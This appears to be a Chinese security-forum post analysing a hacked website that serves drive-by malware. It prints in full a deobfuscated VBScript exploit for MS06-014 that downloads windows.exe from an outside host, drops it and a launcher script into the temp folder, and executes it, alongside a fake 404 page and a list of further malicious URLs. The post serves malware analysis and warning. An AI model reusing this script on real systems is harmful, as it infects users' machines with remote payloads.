看到http://bbs.kafan.cn/viewthread.php?tid=71193&extra=page%3D1里面的那个http://www.cckey.cn上面有两只马,于是想它的主页应该也有吧,也是就上去看看了,果然不出我所料
http://www.cckey.cn/index.htm上面有几个调用的,除了广告和丢失的就是http://www.cckey.cn/cc6/count.js了
里面调用http://www.hyap98.com/123/adnt.htm,unescape侍侯得:
- <SCRIPT>var Words="<script language="VBScript">
- On Error Resume Next
- QnxyX="http://www.hyap98.com/123/windows.exe"
- Set RJURL = document.createElement("object")
- ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
- RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd
- OOBnPl=xxx&mmm
- Set MKHbx = RJURL.CreateObject(OOBnPl,"")
- MKHbx.Open "GET", QnxyX, False
- MKHbx.Send
- MQWLa="~I7PRUGI1VAC.CoM"
- SEiDu="~V5SFDYCLNTK.VbS"
- XpTvd="~V5SFDYCLNTK.VbS"
- SS="Scripting."
- cc="FileSyst"
- rr="emObject"
- Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
- Set SrHOx = Kpzwb.GetSpecialFolder(2)
- MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)
- SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)
- RR="Adod"
- NN="b.stream"
- UoNfL=RR&NN
- Set HSREb = RJURL.createobject(UoNfL,"")
- HSREb.type=1
- HSREb.Open
- HSREb.Write MKHbx.ResponseBody
- HSREb.Savetofile MQWLa,2
- HSREb.Close
- HSREb.Type=2
- HSREb.Open
- HSREb.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
- HSREb.Savetofile SEiDu,2
- HSREb.Savetofile "c:\\NTDETECT.EXE",2
- HSREb.Close
- WSjog="Shell.Applica"
- Set Run = RJURL.createobject(WSjog&"tion","")
- Run.ShellExecute SEiDu,"","","Open",0
- </script></html><script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
- document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
- document.writeln("<P>Additionally, a 404 Not Found");
- document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
- document.writeln("<\/BODY>");}window.onload = init;
- </script>
复制代码
明显一个ms06-014网马,挂了http://www.hyap98.com/123/windows.exe
count.js里面还有一个指针漏洞的网马,http://www.hyap98.com/123/ad.png同样挂了windows.exe
之后http://www.cckey.cn/index.htm跳转到http://www.cckey.cn/index3.htm,里面的http://www.hyap98.com/123/yun.js 和上面count.js挂的是一样的,而http://www.chinaeve.com/game/ad.htm则无法下载。
另有广告页面几个,不贴了
样本几个 |